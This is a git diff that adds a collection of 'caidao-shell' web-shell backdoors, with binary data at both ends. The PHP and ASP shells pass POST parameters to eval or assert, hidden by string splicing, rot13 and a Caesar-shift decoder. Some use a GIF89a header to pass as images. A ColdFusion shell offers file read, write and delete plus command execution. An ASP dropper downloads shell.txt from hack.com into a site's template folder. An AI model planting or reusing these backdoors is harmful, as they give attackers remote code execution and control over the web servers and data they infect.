zQ@nn;1B#_#fuz)zZ(<7Ma3YuG?^6kIR!V-iJkEj;k+iD)-DOU5tjp}>ykd?3h)_5E
zY9U2}esaTASn$S6ne~0v588dpOt{H`4~itU{u0S4xW+4}`s1|gO{r6oBef4Rj6VGt
z3i!fy*hhLm9WFUT$)QR+q9>sdHAE>wuqK4RlQFkkJYGG2^?@b3lF?FYbH)e5BD!<m
zf-S6phM;J{$S`p7^4VE^fz@#tJ1t4D)r{AN)~6r!YhjEZ*RPUVlseO~OY;?{DB<&=
zJZeLF*OqhZecFq93L{RYVuz_LB^*!EMM7PyVkDF6vY5!{anJ#Azgi?4%=`-OxmbYQ
zyENlz*Jit?+^j)@HEs;jLPnBW|2i=9&!L(BUIWp->&qKSTe^CAO5b!1@Cu{<Fp#+s
z;vVc17%C%gs4wps?)vb|UC*E}&ydh_W}%+`4l+LOo-$4<GGPHBt`9tA&R&u?{5N}F
Bc<TTF

literal 0
HcmV?d00001

diff --git a/caidao-shell/download 下载文件.asp b/caidao-shell/download 下载文件.asp
new file mode 100644
index 0000000..cf2d55f
--- /dev/null
+++ b/caidao-shell/download 下载文件.asp	
@@ -0,0 +1,11 @@
+<%
+Set xPost = createObject("Microsoft.XMLHTTP")
+ xPost.Open "GET","http://hack.com/shell.txt",0
+ xPost.Send()
+ Set sGet = createObject("ADODB.Stream")
+ sGet.Mode = 3
+ sGet.Type = 1
+ sGet.Open()
+ sGet.Write(xPost.responseBody)
+ sGet.SaveToFile "D:\website\jingsheng\Templates\heise\html\shell.asp",2  
+ %>
\ No newline at end of file
diff --git a/caidao-shell/fuck.php b/caidao-shell/fuck.php
new file mode 100644
index 0000000..9944670
--- /dev/null
+++ b/caidao-shell/fuck.php
@@ -0,0 +1 @@
+<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('Status:404');Else/**/$K($M);?>
\ No newline at end of file
diff --git a/caidao-shell/guo.php b/caidao-shell/guo.php
new file mode 100644
index 0000000..4384162
--- /dev/null
+++ b/caidao-shell/guo.php
@@ -0,0 +1 @@
+<?php ($www= $_POST['ice']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');?>
\ No newline at end of file
diff --git a/caidao-shell/hkmjj.asp b/caidao-shell/hkmjj.asp
new file mode 100644
index 0000000..100cc31
--- /dev/null
+++ b/caidao-shell/hkmjj.asp
@@ -0,0 +1,22 @@
+<%   
+codeds="Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li"  
+execute (decode (codeds) )   
+Function DeCode (Coded)   
+    On Error Resume Next  
+    For i = 1 To Len (Coded)   
+        Curchar = Mid (Coded, i, 1)   
+        If Asc (Curchar) = 16 then   
+            Curchar = chr (8)   
+Elseif Asc (Curchar) = 24 then   
+            Curchar = chr (12)   
+Elseif Asc (Curchar) = 32 then   
+            Curchar = chr (18)   
+        Else    
+            Curchar = chr (Asc (Curchar) -3)   
+        End if   
+        DeCode = Decode&Curchar   
+    Next  
+End Function  
+'response.write(decode(codeds)) 
+' �˵����� /hkmjj.asp?xx=x ,���� hkmjj
+%>
\ No newline at end of file
diff --git a/caidao-shell/ice.asp b/caidao-shell/ice.asp
new file mode 100644
index 0000000..290ad01
--- /dev/null
+++ b/caidao-shell/ice.asp
@@ -0,0 +1,2 @@
+GIF89a
+<%eval request("ice")%>
\ No newline at end of file
diff --git a/caidao-shell/ice.aspx b/caidao-shell/ice.aspx
new file mode 100644
index 0000000..cf41d48
--- /dev/null
+++ b/caidao-shell/ice.aspx
@@ -0,0 +1,2 @@
+GIF89a
+<%@ Page Language="Jscript"%><%eval(Request.Item["ice"],"unsafe");%>
\ No newline at end of file
diff --git a/caidao-shell/ice.cfm b/caidao-shell/ice.cfm
new file mode 100644
index 0000000..d747e2b
--- /dev/null
+++ b/caidao-shell/ice.cfm
@@ -0,0 +1,27 @@
+<CFSET O="" /><CFTRY><CFSWITCH EXPRESSION=#Form.ice#><CFCASE VALUE="A"><CFSCRIPT>O=O&Expandpath("./")&Chr(9);
+for(c=65;c lt 91;c=c+1){if(DirectoryExists(Chr(c)&":\"))O=O&Chr(c)&":";}</CFSCRIPT></CFCASE><CFCASE VALUE="B">
+<CFDIRECTORY DIRECTORY="#Form.z1#" NAME="D" SORT="Type"><CFLOOP Query="D"><CFSCRIPT>O=O&D.Name;If(D.Type eq "Dir")O=O&"/";
+O=O&Chr(9)&DateFormat(D.DateLastModified,"yyyy-mm-dd")&TimeFormat(D.DateLastModified," HH:MM:ss")&Chr(9)&D.Size&Chr(9);
+If(Left(Form.z1,1) eq "/"){O=O&D.Mode;}else{O=O&D.Attributes;}O=O&Chr(10);</CFSCRIPT></CFLOOP></CFCASE><CFCASE VALUE="C">
+<CFFILE ACTION="Read" FILE="#Form.z1#" VARIABLE="O"></CFCASE><CFCASE VALUE="D"><CFFILE ACTION="Write" FILE="#Form.z1#" OUTPUT="#Form.z2#">
+<CFSET O="1" /></CFCASE><CFCASE VALUE="E"><CFSCRIPT>Function DF(P){F=CreateObject("java","java.io.File").init(P);L=0;i=0;
+if(F.isDirectory()){L=F.listFiles();for(i=1;i lte ArrayLen(L);i=i+1){if(not L[i].delete()){DF(L[i].getPath());}}}F.delete();}
+DF(Form.z1);O="1";</CFSCRIPT></CFCASE><CFCASE VALUE="F"><cffile action="readbinary" file="#Form.z1#" variable="B" />
+<cfset J=CreateObject("java","java.nio.ByteBuffer") /><cfset X=J.Allocate(JavaCast( "int", ArrayLen(B)+6)) />
+<cfset X.Put(ToBinary(ToBase64("->"&"|")), JavaCast("int",0), 3 ) /><cfset X.Put(B, JavaCast("int",0), JavaCast("int",ArrayLen(B)) ) />
+<cfset X.Put(ToBinary(ToBase64("|"&"<-")), JavaCast("int",0), 3 ) /><CFCONTENT Type="application/octet-stream" Variable="#X.Array()#">
+<CFABORT></CFCASE><CFCASE VALUE="G"><CFSCRIPT>F=CreateObject("java","java.io.FileOutputStream");F.init(Form.z1);
+h="0123456789ABCDEF";C=Form.z2;for(i=0;i lt Len(C);i=i+2){F.write(BitOr(BitSHLN(h.indexOf(C.charAt(i)),4),h.indexOf(C.charAt(i+1))));}
+F.close();O="1";</CFSCRIPT></CFCASE><CFCASE VALUE="H"><CFFUNCTION Name="cpf"><CFARGUMENT Name="S"><CFARGUMENT Name="D">
+<CFFILE ACTION="Copy" SOURCE="#S#" DESTINATION="#D#"></CFFUNCTION><CFSCRIPT>Function CP(S,D){sf=CreateObject("java","java.io.File").init(S);
+df=CreateObject("java","java.io.File").init(D);L=0;i=0;if(sf.isDirectory()){if(not df.exists()){df.mkdir();}L=sf.listFiles();
+for(i=1;i lte ArrayLen(L);i=i+1){if(L[i].isDirectory()){CP(L[i].getPath(),df.getPath()&"/"&L[i].getName());}else{
+cpf(L[i].getPath(),df.getPath()&"/"&L[i].getName());}}}else{cpf(S,D);}}CP(Form.z1,Form.z2);O="1";</CFSCRIPT></CFCASE>
+<CFCASE VALUE="I"><CFFILE ACTION="MOVE" SOURCE="#Form.z1#" DESTINATION="#Form.z2#"><CFSET O="1" /></CFCASE><CFCASE VALUE="J">
+<CFDIRECTORY Directory="#Form.z1#" Action="Create"><CFSET O="1" /></CFCASE><CFCASE VALUE="K"><CFSCRIPT>
+FileSetLastModified(Form.z1,ParseDateTime(Form.z2));O="1";</CFSCRIPT></CFCASE><CFCASE VALUE="L"><CFSCRIPT>Z=Form.z2;
+For(i=Len(Z);i gt 0;i=i-1){if(Mid(Z,i,1) eq "/" Or Mid(Z,i,1) eq "\"){Break;}}P=Left(Z,i);F=Mid(Z,i+1,256);</CFSCRIPT>
+<CFHTTP METHOD="Get" URL="#Form.z1#" PATH="#P#" FILE="#F#"><CFSET O="1" /></CFCASE><CFCASE VALUE="M">
+<CFEXECUTE Name="#Mid(Form.z1,3,Len(Form.z1)-2)#" Arguments="#Mid(Form.z1,1,2)# #Form.z2#" Variable="O" TimeOut="60" />
+</CFCASE></CFSWITCH><CFCATCH Type="Any"><CFSET O="ERROR:// "&CFCatch.Message /></CFCATCH>
+</CFTRY><CFOUTPUT>->#Chr(124)&O&Chr(124)#<-</CFOUTPUT>
\ No newline at end of file
diff --git a/caidao-shell/ice.jpg b/caidao-shell/ice.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..2d61496abf737ba321380f75c91ba64bf30b0f5a
GIT binary patch
literal 9023
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
